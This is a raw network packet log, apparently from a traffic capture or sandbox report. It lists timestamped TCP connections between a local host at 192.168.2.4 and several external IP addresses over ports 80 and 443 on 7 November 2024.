Nov 7, 2024 07:33:26.406698942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406713963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406740904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406754971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406773090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406794071 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406821012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406857014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406868935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406881094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.406893015 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.406919956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407015085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407027960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407038927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407049894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407054901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407062054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407072067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407083035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407087088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407114983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407131910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407145023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407182932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407219887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407232046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407242060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407248020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407258034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407259941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407269001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407274961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407315969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407349110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407366991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407377958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407402992 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407429934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.407464981 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407474041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.407509089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.447580099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.447592974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.447603941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.447616100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.447628021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.447662115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.489712000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.489727020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.489794016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.532150030 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.534370899 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.534394026 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.534399033 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.534853935 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.534859896 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.536061049 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.536073923 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.536365032 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.539160967 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.539222956 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.539356947 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.587322950 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.661252975 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.661331892 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.661365986 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.661386967 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.661422014 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.678880930 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.678905964 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.678919077 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.678925991 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.699408054 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.699455976 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.699528933 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.704174995 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.704206944 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.704266071 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.708270073 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.708281994 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.716655016 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.716670036 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.820655107 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:26.820712090 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:26.820771933 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:26.861569881 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:26.861613989 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:26.867327929 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.878079891 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.878112078 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.878606081 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.878612041 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.885658026 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.888819933 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.888840914 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.889534950 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.889542103 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.935260057 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.958859921 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.958879948 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.959299088 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.959302902 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.004892111 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.005255938 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.006187916 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.016366005 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.016431093 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.016505003 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.026992083 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.027004004 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.027014017 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.027019024 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.030788898 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.035708904 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.035708904 CET	49906	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.035731077 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.035741091 CET	443	49906	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.042742014 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.042772055 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.042839050 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.093405962 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.093468904 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.093518019 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.094150066 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.094167948 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.094634056 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.094639063 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.096535921 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.096549034 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.117604017 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.210163116 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.210172892 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.210534096 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.218915939 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.218949080 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.218996048 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.218996048 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.219038010 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.220168114 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.220217943 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.224423885 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.224428892 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.224438906 CET	49907	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.224443913 CET	443	49907	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.225285053 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.241039038 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.241069078 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.241132975 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.247508049 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.247508049 CET	49909	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.247518063 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.247526884 CET	443	49909	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.269025087 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.269037962 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.269182920 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.271318913 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.271348953 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.271367073 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.280946016 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.280991077 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.281131983 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.281331062 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.281344891 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.310745955 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.310758114 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.326802015 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.326821089 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.326916933 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.327096939 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.327107906 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.388153076 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.388200998 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.388245106 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.420166969 CET	49908	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.420176983 CET	443	49908	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.446894884 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.484476089 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.484486103 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.484544039 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.489207983 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:27.489218950 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:27.522521973 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.522552967 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.523035049 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.523041010 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.648400068 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.648448944 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.648519993 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.713433981 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:27.713522911 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:27.836757898 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.937972069 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.937972069 CET	49910	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:27.937999964 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.938011885 CET	443	49910	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.999030113 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:27.999083996 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:27.999111891 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:27.999327898 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.043333054 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.043385983 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.055428028 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.056729078 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.142945051 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.203350067 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.206960917 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.207333088 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.207634926 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:28.233515024 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.233535051 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.237610102 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.237622976 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.238094091 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.239485025 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.239547014 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.239703894 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.257553101 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.257560015 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.260406017 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.260411024 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.260997057 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.261018038 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.261722088 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.261725903 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.287338018 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.288352966 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.288366079 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.288719893 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.288727045 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.289123058 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.289138079 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.289604902 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.289608955 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.307121038 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.307148933 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.307218075 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.307413101 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.307427883 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.320375919 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.363337994 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.363353014 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.363709927 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.365716934 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.365777969 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.366450071 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.390324116 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.390356064 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.390392065 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.390430927 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.390475035 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.390789032 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.390871048 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.390939951 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.407329082 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.414031982 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.414233923 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.414242983 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.414288044 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.414292097 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.414406061 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.415725946 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.415774107 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.428186893 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:28.471329927 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.483887911 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.483901978 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.483911991 CET	49912	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.483916998 CET	443	49912	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.486161947 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.486191034 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.486349106 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.486426115 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.486432076 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.486448050 CET	49914	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.486450911 CET	443	49914	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.487193108 CET	49919	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.487205982 CET	443	49919	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.492002964 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.492024899 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.492034912 CET	49916	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.492039919 CET	443	49916	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.492841005 CET	49913	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.492856979 CET	443	49913	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.521275043 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.521320105 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.521493912 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.673161983 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.673212051 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.673280954 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:28.686629057 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:28.686650038 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.686660051 CET	49911	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:28.686666965 CET	443	49911	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:28.760884047 CET	49915	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.760910034 CET	443	49915	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.811467886 CET	49917	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.811477900 CET	443	49917	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.812711954 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.812741041 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.812800884 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.813014984 CET	49920	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.813028097 CET	443	49920	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.828274965 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.828301907 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.828511000 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.829993010 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.830029964 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.830070972 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.834264040 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.834273100 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.834326029 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.864931107 CET	49921	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.864945889 CET	443	49921	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.865078926 CET	49922	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.865101099 CET	443	49922	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.896611929 CET	49923	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:28.896622896 CET	443	49923	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:28.905050993 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.905059099 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:28.905119896 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.905479908 CET	49924	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:28.905488968 CET	443	49924	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:29.009419918 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.009450912 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.009608030 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.011548042 CET	49925	443	192.168.2.4	184.28.90.27
Nov 7, 2024 07:33:29.011564970 CET	443	49925	184.28.90.27	192.168.2.4
Nov 7, 2024 07:33:29.025207043 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.036711931 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.036740065 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.037144899 CET	49918	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:29.037149906 CET	443	49918	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:29.125102997 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:29.125441074 CET	49926	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:29.131604910 CET	80	49926	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:29.131685019 CET	49926	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:29.132152081 CET	80	49871	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:29.132200003 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:29.163786888 CET	49926	80	192.168.2.4	185.215.113.43
